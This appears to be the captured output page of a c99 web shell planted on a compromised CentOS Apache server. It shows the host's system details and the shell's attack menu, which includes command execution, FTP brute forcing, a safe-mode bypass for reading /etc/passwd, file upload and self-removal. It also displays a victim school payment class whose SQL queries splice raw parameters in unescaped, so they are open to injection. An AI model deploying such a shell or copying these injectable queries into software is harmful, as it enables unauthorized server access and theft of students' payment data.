!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/class/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     clsPayment.php (3.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//--Class Payment--------------------------

include_once "clsbase_Payment.php";

class 
Payment extends base_Payment{

function 
GetSumLateFineByStId($xKey){
    
$this->SetQuery("select sum(lateFine) as num from EnrollFee, Payment where EnrollFee.studentId='$xKey' and EnrollFee.enrollFeeId=Payment.enrollFeeId and paymentLate='Y'");    
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }    
}

function 
GetSumLateFineByStIdAndAcYAndStYAndSe($wKey$xKey$yKey$zKey){
    
$this->SetQuery("select sum(lateFine) as num from EnrollFee, Payment where EnrollFee.studentId='$wKey' and EnrollFee.enrollFeeId=Payment.enrollFeeId and acadYear='$xKey' and studentYear='$yKey' and semester='$zKey' and paymentLate='Y'");    
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }    
}

function 
GetSumLateFineByAcYAndStYAndSeAndPgId($wKey$xKey$yKey$zKey){
    
$this->SetQuery("select sum(lateFine) as num from EnrollFee, Payment where EnrollFee.enrollFeeId=Payment.enrollFeeId and acadYear='$wKey' and studentYear='$xKey' and semester='$yKey' and programId='$zKey' and paymentLate='Y'");    
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }    
}

function 
RSPaymentByPayDateGroupOrderPayDate($xKey$yKey){
    
$this->SetQuery("select payDate from Payment where payDate between '$xKey' and '$yKey' group by payDate order by payDate");
}

function 
GetSumPayAmountByPayDate($xKey){
    
$this->SetQuery("select sum(payAmount) as num from Payment where payDate='$xKey'");    
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }    
}

function 
RSPaymentByPayDateOrderPayDate($xKey$yKey){
    
$this->SetQuery("select * from Payment where payDate between '$xKey' and '$yKey' order by payDate");
}

function 
GetSumPayAmountByEfIdAndPayDate($xKey$yKey){
    
$this->SetQuery("select sum(payAmount) as num from Payment, EnrollFee where Payment.enrollFeeId='$xKey' and payDate<'$yKey' and EnrollFee.enrollFeeId=Payment.enrollFeeId");    
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }    
}

function 
GetSumLateFineByEfId($xKey){
        
$this->SetQuery("select sum(lateFine) as num from Payment where enrollFeeId='$xKey' and paymentLate='Y'");
        if (
$result=$this->GetResult()) {
                return 
$result['num'];
        }      
}

function 
GetMaxYearOfRefNo(){
        
$this->SetQuery("select max(substr(refNo, 5, 2)) as num from Payment");
        if (
$result=$this->GetResult()) {
                return 
$result['num'];
        }      
}

function 
GetMaxNoOfRefNoByYear($xKey){
        
$this->SetQuery("select max(substr(refNo, 1, 3)) as num from Payment where substr(refNo, 5, 2)='$xKey'");
        if (
$result=$this->GetResult()) {
                return 
$result['num'];
        }      
}

//--Use on page paymentEnroll.php--
function RSPaymentByEfId($xKey){
    
$this->SetQuery("select * from Payment where enrollFeeId='$xKey'");    
}


function 
numDateDiff($date1,$date2){
    
$this->SetQuery("SELECT DATEDIFF('$date1','$date2') as num");
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }    
}

function 
GetMaxRefNo(){
    
$this->SetQuery("select max(refNo) as num from Payment");
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }
}

function 
GetMaxCodePayId($enrollFeeId){
    
$this->SetQuery("select max(payId) as num from Payment where enrollFeeId='$enrollFeeId'");
    if (
$result=$this->GetResult()) {
        return 
$result['num'];
    }
}
//--The end--

//--End class Payment--
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0126 ]--